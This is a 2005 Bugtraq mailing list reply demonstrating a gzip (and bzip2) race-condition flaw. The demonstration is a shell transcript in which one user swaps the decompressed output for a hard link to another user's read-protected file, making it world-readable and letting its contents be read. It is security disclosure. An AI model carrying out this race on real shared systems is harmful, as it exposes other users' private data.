Bugtraq mailing list archives
Re: gzip TOCTOU file-permissions vulnerability
From: Theodor Milkov <zimage () icdsoft com>
Date: Thu, 14 Apr 2005 09:36:04 +0300
Joey Hess wrote:
Martin Pitt wrote:
<cut>
Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly?I'm a wimp, so I will use gdb instead of writing some real exploit to win the race.
It is quite easy to win the race when the file that's being decompressed is big:
--- # adduser user-good # adduser user-evil # usermod -G src user-good # usermod -G src user-evil # mkdir /var/www/proj # chown root.src /var/www/proj # chmod 2775 /var/www/proj user-good@zimage:/var/www/proj$ echo "Rather secret data" > secf.txt user-good@zimage:/var/www/proj$ chmod 400 secf.txt user-good@zimage:/var/www/proj$ ls -al secf.txt -r-------- 1 user-good src 19 Apr 14 09:16 secf.txt user-evil@zimage:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256 user-evil@zimage:/var/www/proj$ gzip bigf.bin user-evil@zimage:/var/www/proj$ chmod 666 bigf.bin.gz user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin.gz -rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz -r-------- 1 user-good src 19 Apr 14 09:16 secf.txt user-evil@zimage:/var/www/proj$ cat secf.txt cat: secf.txt: Permission denied user-good@zimage:/var/www/proj$ gzip -d bigf.bin.gz user-evil@zimage:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin -rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt user-evil@zimage:/var/www/proj$ cat secf.txt Rather secret data ---The time between beginning of decompression and unlink+delete was about 2 sec. and decompression has finished about 7-8 seconds later.
The same was tested and applyes to bzip2. Best regards, Theodor -- Theodor Milkov http://www.zimage.del.bg/ CCNA, CCNP, MCP
Current thread:
- gzip TOCTOU file-permissions vulnerability Imran Ghory (Apr 05)
- Re: gzip TOCTOU file-permissions vulnerability Martin Pitt (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability Derek Martin (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability Peter J. Holzer (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability Joey Hess (Apr 13)
- Re: gzip TOCTOU file-permissions vulnerability psz (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability Theodor Milkov (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Derek Martin (Apr 14)
- <Possible follow-ups>
- RE: gzip TOCTOU file-permissions vulnerability Mark Senior (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability Derek Martin (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability devnull (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Dmitry Yu. Bolkhovityanov (Apr 16)
- Re: gzip TOCTOU file-permissions vulnerability Peter J. Holzer (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Scott Gifford (Apr 15)
- Re: gzip TOCTOU file-permissions vulnerability Steve Grubb (Apr 14)
- Re: gzip TOCTOU file-permissions vulnerability Martin Pitt (Apr 13)